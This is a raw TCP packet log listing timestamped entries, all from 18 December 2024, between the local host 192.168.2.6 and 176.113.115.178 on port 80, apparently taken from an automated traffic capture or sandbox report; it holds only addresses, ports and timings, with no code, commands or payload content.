                                                                  Dec 18, 2024 13:49:49.800295115 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.800559998 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.800580978 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.801506996 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.801554918 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.801639080 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.802584887 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.802675962 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.802711010 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.803364992 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.803440094 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.803524971 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.804315090 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.804372072 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.804547071 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.805387974 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.805448055 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.805551052 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.806395054 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.806454897 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.806565046 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.807373047 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.807441950 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.807579994 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.808317900 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.808384895 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.808640957 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.809346914 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.809489012 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.809566975 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.810329914 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.810684919 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.810699940 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.811374903 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.811440945 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.811605930 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.812381029 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.812436104 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.812653065 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.813400984 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.813510895 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.813806057 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.815232992 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.815247059 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.815335989 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.816978931 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.817106009 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.817931890 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.820269108 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.820282936 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.820328951 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.822069883 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.822175980 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.823002100 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.823986053 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.824023962 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.824878931 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.825850010 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.825865984 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.825876951 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.825939894 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.825939894 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.826839924 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.826867104 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.826920986 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.827769995 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.828656912 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.828669071 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.828804016 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.829516888 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.829572916 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.829596996 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.830451965 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.830465078 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.830507040 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.831427097 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.831439018 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.831535101 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.832339048 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.832379103 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.832397938 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.833323956 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.833384991 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.833430052 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.834575891 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.834590912 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.834603071 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.834624052 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.834676981 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.835352898 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.835365057 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.835436106 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.836229086 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.836241961 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.836956978 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.836983919 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.837004900 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.837070942 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.837989092 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.838001966 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.838012934 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.838108063 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.838902950 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.838913918 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.839082956 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.839890957 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.839904070 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.840039968 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.840703011 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.840715885 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.840764046 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.841763973 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.841777086 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.841952085 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.842775106 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.842787027 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.842797041 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.842850924 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.842850924 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.843547106 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.843559027 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.843610048 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.844527006 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.844538927 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.844743967 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.845405102 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.845432997 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.845566988 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.846388102 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.846401930 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.846411943 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.846518040 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.995692015 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.995860100 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.995997906 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.996105909 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.996390104 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.996496916 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.996963024 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.997319937 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.997370005 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.997956038 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.998197079 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.998277903 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.999032021 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.999229908 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:49.999506950 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:49.999974966 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.000196934 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.000268936 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.001009941 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.001163960 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.001262903 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.001960039 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.002207994 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.002460957 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.002964020 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.003194094 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.003231049 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.004045963 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.004262924 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.004323959 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.005022049 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.005219936 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.005326033 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.007323980 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.008193016 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.008205891 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.008222103 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.008245945 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.008347988 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.009110928 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.009943008 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.010204077 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.010471106 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.010492086 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.010567904 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.012346029 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.012360096 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.012448072 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.013288021 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.013298988 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.013397932 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.014050961 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.014085054 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.014297962 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.015961885 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.015976906 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.016037941 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.016928911 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.017864943 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.017924070 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.017966986 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.018713951 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.018733978 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.018765926 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.019701958 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.019730091 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.019742012 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.019815922 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.019815922 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.020610094 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.021609068 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.021620989 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.021742105 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.022484064 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.022500992 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.022573948 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.023406029 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.023420095 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.023432016 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.023519039 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.023519039 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.024327040 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.024339914 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.024411917 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.025149107 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.025165081 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.025254011 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.026020050 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.026034117 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.026201010 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.026978970 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.026992083 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.027076960 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.027686119 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.027698040 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.027760983 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.028608084 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.028620958 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.028692007 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.029403925 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.029417992 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.029493093 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.030204058 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.030216932 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.030417919 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.031053066 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.031064987 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.031337023 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.031883955 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.032330990 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.032763004 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.032778025 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.032833099 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.032866955 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.033550024 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.033955097 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.034049988 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.034411907 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.034797907 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.034903049 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.035264969 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.035641909 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.035810947 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.036184072 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.036504030 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.036801100 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.037182093 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.037431002 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.037538052 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.038247108 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.038475037 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.038599968 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.039207935 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.039433956 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.039702892 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.040251017 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.040510893 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.040699959 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.041212082 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.041443110 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.041527033 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.042265892 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.042478085 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.042613029 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.043556929 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.043778896 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.044065952 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.044295073 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.044485092 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.044608116 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.046401024 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.046412945 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.046474934 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.047547102 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.047559977 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.047667027 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.048427105 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.048439980 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.048501968 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.049273014 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.103132963 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.187797070 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.188024044 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.188067913 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.188496113 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.188730001 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.188815117 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.189055920 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.189491987 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.189565897 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.189857960 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.190499067 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.190562963 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.190702915 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.191478968 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.191528082 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.191695929 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.192492008 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.192567110 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.192692041 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.193504095 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.193691015 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.193733931 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.194613934 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.194679976 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.194823980 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.195506096 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.195564032 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.195723057 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.196559906 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.196688890 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.196960926 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.197753906 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.197869062 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.198174953 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.198612928 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.198659897 CET4982280192.168.2.6176.113.115.178
                                                                  Dec 18, 2024 13:49:50.198987007 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.199559927 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.199807882 CET8049822176.113.115.178192.168.2.6
                                                                  Dec 18, 2024 13:49:50.199826956 CET4982280192.168.2.6176.113.115.178
